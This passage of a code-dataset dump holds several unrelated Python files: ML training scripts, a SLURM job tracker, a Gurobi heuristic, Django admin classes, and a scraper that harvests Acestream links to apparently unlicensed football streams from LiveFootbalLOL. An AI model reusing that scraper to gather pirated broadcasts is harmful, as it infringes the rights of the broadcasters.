train_labels.values\r\n train_labels = np.reshape(train_labels, (-1))\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(train_images, train_labels, test_size=0.10, random_state=2)\r\n #X_test, X_rem, y_test, y_rem = train_test_split(X_test, y_test, test_size=0.90, random_state=2)\r\n \r\n X_tensor_train = torch.tensor(X_train) \r\n y_tensor_train = torch.tensor(y_train)\r\n X_tensor_test = torch.tensor(X_test)\r\n y_tensor_test = torch.tensor(y_test)\r\n\r\n train_dataset = CustomDataset(X_tensor_train, y_tensor_train)\r\n test_dataset = CustomDataset(X_tensor_test, y_tensor_test)\r\n\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,batch_size=2, shuffle=True)\r\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,batch_size=2, shuffle=True)\r\n \r\n return train_loader, test_loader, X_tensor_test, y_tensor_test\r\n \r\n'''\r\nMAIN\r\n'''\r\ncross_entropy = nn.CrossEntropyLoss()\r\n\r\n#LOAD MODEL\r\nnet = Net2()\r\n#net = Net3()\r\n#net = vgg.vgg16(pretrained=True)\r\n\r\n#SAVES CURRENT BEST ACCURACY + LOAD BEST MODEL\r\n#best_model_accuracy = 0\r\n#net.load_state_dict(torch.load('90_5.ckpt'))\r\n\r\n#GET INDICES OF WRONGLY PREDICTED IMAGES IN VALIDATION SET\r\n#_,_, X_tensor_test, y_tensor_test = build_loaders()\r\n#predicted = getPredictionsValidation(X_tensor_test)\r\n#wrongs = getWrongs(predicted, y_tensor_test)\r\n\r\n#GET PREDICTED LABELS FOR THE TEST SET\r\n#predicted = predictTest() \r\n\r\n#TRAIN THE MODEL\r\n\r\n#load the datasets into a loader\r\ntrain_loader, test_loader,_,_ = build_loaders() \r\n\r\nnum_epochs = 20\r\nlearning_rate = 
0.0007\r\nloss_accuracy_lr = np.zeros((20,3)) \r\nbest_model_accuracy = 0 #must be initialized here, since the block above that loads a previous best model is commented out\r\n#we compare the accuracy of our newly trained model to our previous best model\r\nfor epoch in range(num_epochs):\r\n best_model_accuracy = makeItLearn(epoch, best_model_accuracy)\r\n","repo_name":"VinceBaz/COMP551_3","sub_path":"ourCode.py","file_name":"ourCode.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42436113834","text":"import torch.nn.functional as F\nfrom data.images import CIFAR10_NAME, TINY_IMAGENET_NAME\nfrom torch import Tensor, nn\n\nfrom models.basenet import BaseNet\n\n\nclass VanillaCNN(BaseNet):\n def __init__(self, net_id: int, class_id: int, dataset_name: str) -> None:\n super(VanillaCNN, self).__init__(net_id, class_id)\n\n assert dataset_name in [TINY_IMAGENET_NAME, CIFAR10_NAME]\n\n if dataset_name == TINY_IMAGENET_NAME:\n config = [[8, 3, 2], [16, 3, 2], [32, 3, 2], [64, 3, 2], [64, 3, 2]]\n input_size = 64\n in_ch = 3\n num_classes = 200\n else:\n config = [[8, 3, 2], [8, 3, 1], [32, 3, 2], [64, 3, 1], [64, 3, 2]]\n input_size = 32\n in_ch = 3\n num_classes = 10\n\n tot_stride = 1\n self.layers = nn.ModuleList()\n for conf in config:\n out_ch, ks, stride = conf\n self.layers.append(nn.Conv2d(in_ch, out_ch, ks, stride=stride, padding=1))\n in_ch = out_ch\n tot_stride *= stride\n\n final_size = input_size // tot_stride\n out_ch = config[-1][0]\n self.layers.append(nn.Linear(final_size * final_size * out_ch, num_classes))\n\n def forward(self, x: Tensor) -> Tensor:\n for layer in self.layers[:-1]:\n x = F.leaky_relu(layer(x))\n x = x.view(x.size()[0], -1)\n x = self.layers[-1](x)\n\n return x\n\n def func_forward(self, x: Tensor, prep: Tensor) -> Tensor:\n params = self.params_from_prep(prep)\n\n for i in range(len(self.layers[:-1])):\n stride = self.layers[i].stride\n idx = i * 2\n x = F.conv2d(x, params[idx], bias=params[idx + 1], stride=stride, padding=1)\n x = F.leaky_relu(x)\n\n x = x.view(x.size()[0], -1)\n x = F.linear(x, params[-2], bias=params[-1])\n\n return x\n","repo_name":"CVLAB-Unibo/netspace","sub_path":"models/vanillacnn.py","file_name":"vanillacnn.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"34074162847","text":"from collections import deque\n\ndef solution(circle: deque, K: int):\n counter = 0\n while circle:\n counter += 1\n if counter % K == 0:\n print(circle.popleft(), end='')\n if circle:\n print(', ', end='')\n else:\n circle.append(circle.popleft())\n\nN, K = map(int, input().split())\ncircle = deque([i for i in range(1, N + 1)])\nprint('<', end='')\nsolution(circle, K)\nprint('>')\n","repo_name":"lawnmowing-programmer/algo","sub_path":"홍석민/week3/2023.03.13/boj11866/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"72856865607","text":"import onnxruntime\nimport numpy as np\nimport cv2 as cv\nimport numba\nEP_list = ['CUDAExecutionProvider', 'CPUExecutionProvider']\n\nort_session = onnxruntime.InferenceSession(\"model.onnx\", providers=EP_list)\n\n@numba.njit\ndef assemblyFrame(ort_outputs, frame):\n colors =[\n [255, 0, 0],\n [255, 255, 0],\n [64, 255, 0],\n [0, 255, 255],\n [0, 64, 255],\n [255, 0, 128],\n [128, 0, 255],\n [128, 128, 128],\n [255, 128, 0],\n [0, 128, 255],\n [255, 255, 255],\n [0, 0, 0],\n [179, 130, 122],\n [222, 222, 222]\n ] \n\n # res = np.zeros([256,256,3], dtype=numba.uint8)\n res = [[[0,0,0] for _ in range(256)] for _ in range(256)]\n\n i_iter = len(ort_outputs[0][0])\n k_iter = len(ort_outputs[0][0,0])\n n_iter = len(ort_outputs[0][0,0][0])\n\n for k in range(k_iter):\n for n in range(n_iter):\n colorMax = [0.0, 13.0]\n for i in range(i_iter):\n val = ort_outputs[0][0,i][k][n]\n if val > colorMax[0]:\n colorMax = [val, i]\n\n color = colors[int(colorMax[1])]\n\n res[k][n] = color\n\n return np.array(res, dtype=np.uint8), frame\n\n\n\n \ndef processing(frame):\n resized_frame = cv.resize(frame, (256, 256)) \n frame = np.array([resized_frame[:, :, 0], resized_frame[:, :, 1], resized_frame[:, :, 2]], dtype=np.float32)\n ort_inputs = {ort_session.get_inputs()[0].name: np.array([frame])}\n ort_outputs = ort_session.run(None, ort_inputs)\n res = assemblyFrame(ort_outputs, resized_frame)\n return res\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Firesieht/organs","sub_path":"recognise.py","file_name":"recognise.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70189327370","text":"# Python script to take an input corresponding to either a reference\n# (R4IDs) or query sequencing run, and output a random subsample of reads.\n\n# Author: Joe Parker (@lonelyjoeparker // joe@lonelyjoeparker.com)\n\n###########################################\n# Pseudocode for selecting subsets of reads\n#\n# add sequences\n#for r in read:\n#\tadd r.index to sequence hash with value r.seq\n#\tadd random to index hash with value r.index\n#\n# order by random integers\n#new keys hash = ordered random index hash\n#\n# select first n and output\n#for i in samples:\n#\tselect new keys hash [i]\n#\toutput append sequence hash [new keys hash[i]]\n\nimport argparse, random\nfrom Bio import SeqIO, SeqRecord\nfrom Bio.Seq import Seq\n\n# set up an argparse object to parse the N parameter\nparser = argparse.ArgumentParser(description='Python script to take an input corresponding to either a reference (R4IDs) or query sequencing run, and output a random subsample of reads.')\nparser.add_argument('N_subsamples', metavar='N', type=int, nargs='+', help='N - how many reads to subsample')\nparser.add_argument('input_file',type=argparse.FileType('r'),help='filename to open')\nparser.add_argument('output_file',type=argparse.FileType('w'),help='filename to write to')\n\n# evaluate the args\nargs = parser.parse_args()\n\n# set up input and output lists\ninput_sequences = {}\noutput_sequences = list()\n\n# read input\nwith args.input_file as file:\n sequence_file_iterator = SeqIO.parse(file,'fasta')\n for record in sequence_file_iterator:\n #print(record.description)\n #print(record.seq)\n input_sequences[record.id]=record\n\n file.close()\n\n#print 'total length of seqs hash dict ' + str(len(input_sequences))\n\n# pick subsamples\nfor i in range(0,args.N_subsamples[0]):\n\trandom_key = input_sequences.keys()[random.randint(0,len(input_sequences)-1)]\n\t#print str(i) + ': random key ' + random_key\n\toutput_sequences.append(input_sequences[random_key])\n\tdel input_sequences[random_key]\n\n# write output\t\nSeqIO.write(output_sequences,args.output_file,'fasta')\n","repo_name":"lonelyjoeparker/oddjects-sandbox","sub_path":"R4IDs/manuscript-analyses/simulate_partial_R4IDs.py","file_name":"simulate_partial_R4IDs.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41184712479","text":"import os\n\n### === INITIALIZE === ###\n\nscript_name = os.path.realpath(__file__).split('/')[-1]\nwdir = os.path.realpath(__file__).split(script_name)[0]\nos.chdir(wdir)\n\n### === FUNCTIONS === ###\nprint_q = 'squeue --user=`whoami` --format=\"%.7A %.35j %.10u %.7C %.10M %.15l %.20R\"'\ndef store_job_info():\n os.system(print_q + ' > current_queue.tmp')\n file = open('current_queue.tmp','r')\n lines = file.readlines()\n file.close()\n job_names = []\n job_ids = []\n working_dirs = []\n for line in lines[1:]:\n job_name = line.split()[1]\n job_id = line.split()[0]\n os.system('scontrol show job {} > jobinfo.tmp'.format(job_id))\n file2 = open('jobinfo.tmp','r')\n lines2 = file2.readlines()\n file2.close()\n for line2 in lines2:\n if 'WorkDir' in line2:\n working_dir = line2.split('WorkDir=')[1].split('\\n')[0]\n job_names.append(job_name)\n job_ids.append(job_id)\n working_dirs.append(working_dir)\n os.system('rm current_queue.tmp')\n os.system('rm jobinfo.tmp') \n with open('.current_jobs.txt','w') as f:\n for job in range(len(job_ids)):\n f.write(job_ids[job])\n f.write('\\t')\n f.write(job_names[job])\n f.write('\\t')\n f.write(working_dirs[job])\n f.write('\\n')\n return job_ids\n\ndef find_completed_jobs(job_ids):\n file = open('.previous_jobs.txt','r')\n lines = file.readlines()\n file.close()\n count = 0\n for line in lines:\n if line.split()[0] not in job_ids:\n count += 1\n print('This job is no longer running since the last time you checked: \\n NAME: {} \\n JOB ID: {} \\n Working Directory: {}.'.format(line.split()[1],line.split()[0],line.split()[2]))\n if count == 0:\n print('No jobs have ended since the last time you checked!')\n\n\n### === MAIN === ###\nif '.current_jobs.txt' not in os.listdir():\n print('No previously submitted jobs are stored. Either the file was deleted or this is your first time running this script.')\n store_job_info()\n print('The current running jobs have now been stored. Run this script again and you should not see this message.')\n\nelse:\n os.system('mv .current_jobs.txt .previous_jobs.txt')\n job_ids = store_job_info()\n print('Jobs you are currently running:')\n print('================================================================================================================')\n os.system(print_q)\n print('================================================================================================================')\n find_completed_jobs(job_ids)\n print('================================================================================================================')\n\n","repo_name":"hklem/slurm_job_tracking","sub_path":"jobcheck.py","file_name":"jobcheck.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"16660224581","text":"from lib.mongo_connection import MongoConnection\nfrom lib.linguistic_functions import get_supported_languages\nfrom nlp.config import SERVER\nfrom polyglot.load import load_embeddings\n\n\ndef add_polyglot_default():\n \"\"\"Defining default polyglot models\"\"\"\n entities = []\n load_embeddings()\n polyglot_model = [\n {\n 'model_settings': {\n 'tag': 'I-LOC',\n 'polyglot_model': 'ner2',\n 'case_sensitive': True\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected locations',\n 'name': 'Detects locations'\n },\n {\n 'model_settings': {\n 'tag': 'I-PER',\n 'polyglot_model': 'ner2',\n 'case_sensitive': True\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected personality',\n 'name': 'Detects persons'\n },\n {\n 'model_settings': {\n 'tag': 'I-ORG',\n 'polyglot_model': 'ner2',\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected organizations',\n 'name': 'Detects organizations'\n },\n # {\n # 'model_settings': {\n # 'tag': 'negative_word',\n # 'polyglot_model': 'sentiment2',\n # 'case_sensitive': False\n # },\n # 'training': 'finished',\n # 'available': True,\n # 'type': 'default_polyglot',\n # 'description': 'Trained model based on a neural network, detected negative words',\n # 'name': 'negative words'\n # },\n # {\n # 'model_settings': {\n # 'tag': 'positive_word',\n # 'polyglot_model': 'sentiment2',\n # 'case_sensitive': False\n # },\n # 'training': 'finished',\n # 'available': True,\n # 'type': 'default_polyglot',\n # 'description': 'Trained model based on a neural network, detected positive words',\n # 'name': 'positive words'\n # },\n # {'model_settings': {'tag': 'polarity_sentence', 'polyglot_model': 'sentiment2'},\n # 'status': 'train', 'available': True, 'type': 'default_polyglot',\n # 'name': 'Polyglot default detected polarity of sentence'},\n # {'model_settings': {'tag': 'polarity_text', 'polyglot_model': 'sentiment2'},\n # 'status': 'train', 'available': True, 'type': 'default_polyglot',\n # 'name': 'Polyglot default detected polarity of document'},\n ]\n\n mongo = MongoConnection()\n for language in SERVER['language']:\n # Adding Entities\n for model in polyglot_model:\n # full_name = Language.from_code(language).name\n # if full_name in tools.list_decode(\n # downloader.supported_languages(model['model_settings']['polyglot_model'])\n # ):\n if language in get_supported_languages(model['model_settings']['polyglot_model']):\n model['language'] = language\n model['training'] = 'finished'\n model['available'] = True\n # model['user'] = DEFAULT_USER[language]\n entities.append(model)\n find_entity = model.copy()\n del find_entity['description']\n find_model = mongo.default_entity.find_one(find_entity)\n if find_model is None:\n if '_id' in model:\n del model['_id']\n try:\n # model_id = mongo.default_entity.insert(model)\n mongo.default_entity.insert(model)\n except Exception:\n print(model)\n raise\n # mongo.users.update_one(\n # {'_id': DEFAULT_USER[language]},\n # {'$addToSet': {'entity': model_id}},\n # upsert=True\n # )\n return 
entities\n","repo_name":"dari28/RebuildPR","sub_path":"newsAPI/install/install_default_model.py","file_name":"install_default_model.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8109943999","text":"import gurobipy\n\nclass LeastStopsRemovalMIP(object):\n \"\"\"\n Assume that each stop adds to the total features linearly, and therefore\n solve a Knapsack problems to maximize the utility\n \"\"\"\n def __init__(self, dict_feat_gap, dict_stop_feat_weight,dict_stop_dual_val):\n self.dict_feat_gap = dict_feat_gap # dict[feat] = gap\n self.dict_stop_feat_weight = dict_stop_feat_weight # dict[stop_id][feat] = weight removal\n self.dict_stop_dual_val = dict_stop_dual_val # dict[stop_id] = dual value\n\n # MIP parameters\n self.modelOptim = gurobipy.Model(\"MIP for removal heuristic\")\n self.modelOptim.Params.LogToConsole = 0\n self.modelOptim.modelSense = gurobipy.GRB.MINIMIZE\n self.modelOptim.Params.LogFile = 'least_stop_mip.log'\n # self.modelOptim.Params.Method = -1\n\n self.EPSILON = 0.001\n self.bigM = 10000\n self.alpha = 10 # importance given to the reduced cost\n\n # storage\n self.var_activation_stop = {} # a dict[stop_id] = var\n self.var_violation_cst = {} # a dict[feature] = var\n\n\n def _create_var_stops(self):\n \"\"\"\n Create the stop variable, binary\n \"\"\"\n for stop_id in self.dict_stop_feat_weight:\n varname = 'act_' + stop_id\n cost = 1 + self.alpha * self.dict_stop_dual_val[stop_id]\n self.var_activation_stop[stop_id] = self.modelOptim.addVar(0,1,cost,gurobipy.GRB.BINARY,varname)\n\n\n def _create_var_violation(self):\n \"\"\"\n Create the violation variable, binary\n \"\"\"\n for feat in self.dict_feat_gap:\n varname = 'violation_' + feat\n cost = 0\n self.var_violation_cst[feat] = self.modelOptim.addVar(0,1,cost,gurobipy.GRB.BINARY,varname)\n\n\n def _cst_violation_feature(self,percentage =1):\n \"\"\"\n Ensure that the violation value only takes value one if the features constraints are actually violated.\n :param percentage: the percentage of the gap to be considered\n \"\"\"\n for feature in self.dict_feat_gap:\n cst_name = 'Violation_' + feature\n gap = percentage * self.dict_feat_gap[feature]\n\n if gap >=0:\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] * self.dict_stop_feat_weight[stop_id][feature] for stop_id in self.var_activation_stop.keys()) - gap >=\n - (1- self.var_violation_cst[feature]) * self.bigM,\n cst_name)\n else:\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] * self.dict_stop_feat_weight[stop_id][feature] for stop_id in self.var_activation_stop.keys()) - gap + self.EPSILON <=\n (1- self.var_violation_cst[feature]) * self.bigM,\n cst_name)\n\n\n def _cst_at_least_one_violated(self):\n \"\"\"\n Make sure that at least one of the constraints is violated\n \"\"\"\n cst_name = \"at_least_one_violated\"\n self.modelOptim.addConstr(sum(self.var_violation_cst[feat] for feat in self.var_violation_cst.keys()) >= 1,\n cst_name)\n\n def _cst_at_least_one_stop_selected(self):\n \"\"\"\n Make sure that at least one of the stops is selected. 
Which may not necessarily be the case if we have to introduce\n a gap due to initial infeasibility\n \"\"\"\n cst_name = \"at_least_one_stop\"\n self.modelOptim.addConstr(sum(self.var_activation_stop[stop_id] for stop_id in self.var_activation_stop.keys()) >= 1,\n cst_name)\n\n\n def _retrieve_solution(self):\n \"\"\"\n :return: a list of selected_stop\n \"\"\"\n list_stop_id = []\n for stop_id in self.var_activation_stop:\n var = self.var_activation_stop[stop_id]\n\n if abs(var.x) >= self.EPSILON:\n list_stop_id.append(stop_id)\n\n return list_stop_id\n\n\n def _deal_with_infeasible(self):\n \"\"\"\n Deal with infeasibility problem which may arise due to the limited number of stops tested\n :return the list of selected stop_id or all_stops_id\n \"\"\"\n nb_iter = 0\n while self.modelOptim.Status == gurobipy.GRB.INFEASIBLE and nb_iter < 7:\n nb_iter += 3\n # remove all constraints\n self.modelOptim.remove(self.modelOptim.getConstrs())\n self.modelOptim.update()\n\n # re -add the constraint\n self._cst_at_least_one_violated()\n percentage = (10-nb_iter)/10\n self._cst_violation_feature(percentage)\n self.modelOptim.optimize()\n\n\n if self.modelOptim.Status == gurobipy.GRB.INFEASIBLE:\n return list(self.var_activation_stop.keys())\n else:\n return self._retrieve_solution()\n\n\n def solve(self):\n \"\"\"\n Main function, solve the knapsack problem\n :return: the list of selected stop_id\n \"\"\"\n self._create_var_stops()\n self._create_var_violation()\n self._cst_at_least_one_violated()\n self._cst_violation_feature()\n self._cst_at_least_one_stop_selected()\n\n self.modelOptim.optimize()\n\n if self.modelOptim.Status == gurobipy.GRB.INFEASIBLE:\n return self._deal_with_infeasible()\n\n else:\n return self._retrieve_solution()\n","repo_name":"jpoulletXaccount/MIT_thesis_OR_ML","sub_path":"src/optimization_step/scp_approach/heuristics_improvement/least_stops_removal_MIP.py","file_name":"least_stops_removal_MIP.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"19082712151","text":"from django.contrib import admin\nfrom django.utils.translation import ugettext_lazy as _ul\n\nfrom apps.blogs.models import Category, Comment, Post, Tag\nfrom apps.generic.admin import GenericModelAdmin\n\n\n@admin.register(Tag)\nclass TagAdmin(GenericModelAdmin):\n pass\n\n\n@admin.register(Category)\nclass CategoryAdmin(GenericModelAdmin):\n list_display = (\n 'name',\n 'is_published',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_published',\n 'categorytype'\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'name',\n 'description',\n 'categorytype',\n 'image_class',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n )\n }),\n (_ul(u'Seo'), {\n 'fields': (\n 'slug',\n 'seo_title',\n 'seo_description',\n 'seo_keywords',\n 'seo_author'\n )\n }),\n )\n search_fields = ('name', 'description',)\n\n\n@admin.register(Post)\nclass PostAdmin(GenericModelAdmin):\n list_display = (\n 'title',\n 'category',\n 'author',\n 'rate',\n 'view_count',\n 'num_comments',\n 'publication_date',\n 'is_published',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_published',\n 'category',\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'author',\n 'category',\n 'tags',\n 'title',\n 'picture',\n 'announcement',\n 'post',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n 'publication_date',\n )\n }),\n (_ul(u'Seo'), {\n 'fields': (\n 'slug',\n 'seo_title',\n 'seo_description',\n 'seo_keywords',\n 'seo_author'\n )\n }),\n (_ul(u'Голосование'), {\n 'fields': (\n 'rate',\n )\n }),\n (_ul(u'Заметки'), {\n 'fields': (\n 'notes',\n )\n }),\n )\n filter_horizontal = ('tags',)\n search_fields = ('title', 'announcement',)\n\n def formfield_for_dbfield(self, db_field, *args, **kwargs):\n formfield = super(PostAdmin, self).formfield_for_dbfield(db_field, *args, **kwargs)\n if db_field.name == 'author':\n formfield.initial = kwargs['request'].user\n if db_field.name == 'seo_author':\n formfield.initial = kwargs['request'].user.get_full_name()\n if db_field.name == 'is_published':\n formfield.initial = False\n formfield.help_text = \"\"\"\n Перед публикацией разместите статью в\n \n \n Yandex оригинальные тексты\n \"\"\" # noqa\n return formfield\n\n def get_queryset(self, request):\n qs = super(PostAdmin, self).get_queryset(request)\n return qs.exclude(category__categorytype=Category.CATEGORY_QUESTIONS)\n\n class Media:\n js = (\n '/static/jquery/jquery.min.js',\n '/static/jquery/jquery.synctranslit.min.js',\n '/static/site/js/admin.js',\n )\n\n\n@admin.register(Comment)\nclass CommentAdmin(GenericModelAdmin):\n search_fields = ('comment', 'author_username', 'author__username')\n list_display = (\n 'comment',\n 'creation_date',\n 'author_username',\n 'is_published',\n 'is_spam',\n GenericModelAdmin.site_url,\n )\n list_filter = (\n 'is_spam',\n 'is_published',\n )\n list_editable = (\n 'is_spam',\n 'is_published',\n )\n fieldsets = (\n (None, {\n 'fields': (\n 'comment',\n )\n }),\n (_ul(u'Доступ'), {\n 'fields': (\n 'is_published',\n 'is_spam'\n )\n }),\n (_ul(u'Голосование'), {\n 'fields': (\n 'rate',\n )\n }),\n (_ul(u'Связи'), {\n 'fields': (\n 'parent',\n 'post',\n )\n }),\n (_ul(u'Автор'), {\n 'fields': (\n 'author',\n 'author_username',\n 'ip_address',\n )\n }),\n )\n readonly_fields = ('parent', 'post', 'author', 
'author_username')\n","repo_name":"animeshinvinci/obelektrike","sub_path":"apps/blogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"32602022597","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nimport re\n\nimport xbmc\nfrom bs4 import BeautifulSoup\n\nimport tools\nfrom lib import lang, art\nfrom lib.cache import Cache\nfrom lib.errors import WebSiteError\n\n\nclass LiveFootbalLOL:\n\n __web_url = 'http://livefootballol.me/'\n\n def __init__(self, settings):\n self.__settings = settings\n\n def get_menu(self):\n \"\"\"\n Get the list of LiveFootbalLOL categories: agenda and competitions\n\n :return: The list of LiveFootbalLOL categories\n :rtype: list\n \"\"\"\n return [\n {\n 'name': 'Hoy y mañana',\n 'icon': tools.build_path(self.__settings['path'], 'hoy_manana.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }, {\n 'name': 'Agenda 7 días',\n 'icon': tools.build_path(self.__settings['path'], 'siete_dias.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }, {\n 'name': 'Competiciones',\n 'icon': tools.build_path(self.__settings['path'], 'competiciones.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg')\n }]\n\n def __get_competition_art(self, competition):\n return {\n 'icon': art.get_competition_icon(competition, self.__settings['path'], default='futbol.png'),\n 'fanart': tools.build_path(self.__settings['path'], 'futbol_art.jpg')\n }\n\n @staticmethod\n def __get_event_name(event, date, time, competition):\n color = 'yellow'\n now = datetime.datetime.now()\n\n event_date = date.split('-')\n event_time = time.split(':')\n\n event_dt_start = datetime.datetime(\n int(event_date[2]),\n int(event_date[1]),\n int(event_date[0]),\n int(event_time[0]),\n int(event_time[1])\n )\n\n # noinspection PyTypeChecker\n if event_dt_start - datetime.timedelta(minutes=5) <= now <= event_dt_start + datetime.timedelta(hours=2):\n color = 'lime'\n elif now >= event_dt_start:\n color = 'orange'\n\n name = event.split('-')\n name = '%s - %s' % (name[0], name[1]) if len(name) == 2 else event\n\n return '[COLOR %s](%s %s:%s)[/COLOR] (%s) [B]%s[/B]' % \\\n (color, date[:5], event_time[0], event_time[1], lang.translate(competition), name)\n\n def __get_urls(self, page):\n agenda_url = None\n url = re.findall(r'href=[\\'\"]?([^\\'\" >]+).*title=\"Live Football Streaming\"', page, re.U)\n if url and len(url) == 1:\n agenda_url = url[0] if 'http' in url[0] else '%s%s' % (\n self.__web_url[:-1] if url[0].startswith('/') else self.__web_url, url[0])\n if agenda_url:\n return {'agenda': agenda_url}\n return None\n\n def get_all_events(self):\n \"\"\"\n Get all LiveFootbalLOL events\n\n :return: The list of LiveFootbalLOL events\n :rtype: list\n \"\"\"\n cache = Cache(self.__settings['path'])\n\n # Busca la URI de la agenda y los enlaces de los canales en caché\n page = cache.load(self.__web_url, False)\n if page:\n # La URI de la agenda está en caché, busca también los eventos\n events = cache.load(page['agenda'])\n if events:\n for event in events:\n event['name'] = self.__get_event_name(\n event['event'], event['date'], event['time'], event['competition'])\n return events\n\n # La URI de la agenda no está en cache\n # Vuelve a obtener la agenda y los eventos\n events = []\n\n # GET livefootballol.in\n page = tools.get_web_page(self.__web_url)\n\n # Averigua la URI de la agenda\n urls = self.__get_urls(page)\n if not urls:\n raise WebSiteError(\n u'Agenda no encontrada',\n u'Los de LiveFootbalLOL han hecho cambios en la Web',\n time=self.__settings['notify_secs']\n )\n\n # Guarda la URI de la agenda en caché\n cache.save(self.__web_url, urls)\n\n # 
GET agenda\n agenda = tools.get_web_page(urls['agenda'])\n\n # Obtiene la tabla de eventos\n a_events = re.findall(\n r'([0-9]{1,2}:[0-9]{2})\\s*(.*)',\n agenda,\n re.U)\n\n # Obtiene las ligas\n a_leagues = re.findall(\n r'(.*)\\s*
', page, re.U)\n\n # Obtiene la tabla de datos de los canales\n soup = BeautifulSoup(page, 'html5lib')\n table = soup.find('table', attrs={'class': 'uk-table uk-table-hover uk-table-striped'})\n\n # Obtiene los datos de los canales\n prev_lang = None\n for row in table.findAll(\"tr\")[2:]:\n cells = row.findAll(\"td\")\n\n # Obtiene los datos generales del canal\n ch_name = tools.str_sanitize(cells[1].get_text())\n ch_lang = tools.str_sanitize(cells[0].get_text())\n\n # ¿Hay ya enlaces?\n if 'will be here' in ch_name:\n match = re.findall(r'[Mm][Aa][Tt][Cc][Hh]\\s*
(.*)
', page, re.U)\n if len(channels) > 0:\n break\n else:\n raise WebSiteError(\n match[0] if match else u'LiveFootbalLOL',\n u'Todavía no se han publicado los enlaces del partido',\n time=self.__settings['notify_secs']\n )\n\n # Si no es un enlace acestream continua\n ch_link = tools.str_sanitize(cells[1].find('a').get('href'))\n if not ch_link or 'acestream' not in ch_name.lower():\n continue\n\n # Obtiene el idioma\n if not ch_lang or not re.findall(r'(\\[[A-Z]{2}\\])', ch_lang, re.U):\n ch_lang = prev_lang if prev_lang else '[--]'\n prev_lang = ch_lang if ch_lang else '[--]'\n\n # Obtiene los datos extendidos y los hashlinks del canal\n channel_data = self.__get_channel_data(cache, ch_link)\n if channel_data:\n for link in channel_data['links']:\n channels.append(\n {\n 'name': self.__get_channel_name(\n channel_data['name'],\n channel_data['bitrate'],\n link['hd'],\n ch_lang),\n 'icon': art.get_channel_icon(channel_data['name'], self.__settings['path']),\n 'fanart': tools.build_path(self.__settings['path'], 'lfol_art.jpg'),\n 'hash': link['hash']\n }\n )\n\n if len(channels) == 0:\n match = re.findall(r'[Mm][Aa][Tt][Cc][Hh]\\s*
(.*)
', page, re.U)\n raise WebSiteError(\n u'%s' % (match[0]) if match else u'LiveFootbalLOL.me',\n u'Hay enlaces del partido pero no son de acestream. Inténtalo más tarde...',\n time=self.__settings['notify_secs']\n )\n\n # Guarda los eventos en caché\n cache.save(e_url, channels)\n\n return channels\n\n @staticmethod\n def __get_channel_data(cache, url):\n \"\"\"\n Get channel data for an URL\n\n :param url: The channel URL\n :type: url: str\n :return: The Acestream channel data\n :rtype: dict\n \"\"\"\n # Busca los datos del canal en caché\n channel_data = cache.load(url, True)\n if channel_data:\n return channel_data\n\n # Los datos del canal no están en cache\n # Vuelve a obtenerlos\n\n # GET url\n page = tools.get_web_page(url)\n\n # Obtiene la tabla de canales\n soup = BeautifulSoup(page, 'html5lib')\n table = soup.find('table', attrs={'class': 'uk-table'})\n\n # Datos del canal\n ch_name = ''\n ch_sign = ''\n ch_rate = ''\n ch_links = []\n\n # Obtiene los datos del canal\n for row in table.findAll(\"tr\"):\n cells = row.findAll(\"td\")\n cell_0 = tools.str_sanitize(cells[0].get_text())\n if len(cells) == 2:\n if 'Name' in cell_0:\n ch_name = tools.str_sanitize(cells[1].get_text())\n elif 'Bitrate' in cell_0:\n ch_rate = tools.str_sanitize(cells[1].get_text())\n elif 'Signal' in cell_0:\n ch_sign = tools.str_sanitize(cells[1].get_text())\n elif 'acestream://' in cell_0:\n hashes = re.findall(\n r'[acestrm:/]*([0-9a-f]{40})', tools.str_sanitize(cells[0].find('a').get('href')), re.U)\n if hashes:\n ch_links.append({\n 'hash': hashes[0],\n 'hd': '(HD)' in cell_0\n })\n\n if len(ch_links) == 0:\n return None\n\n channel_data = {\n 'name': ch_name,\n 'bitrate': ch_rate,\n 'signal': ch_sign,\n 'links': ch_links\n }\n\n # Guarda los datos del canal en caché\n cache.save(url, 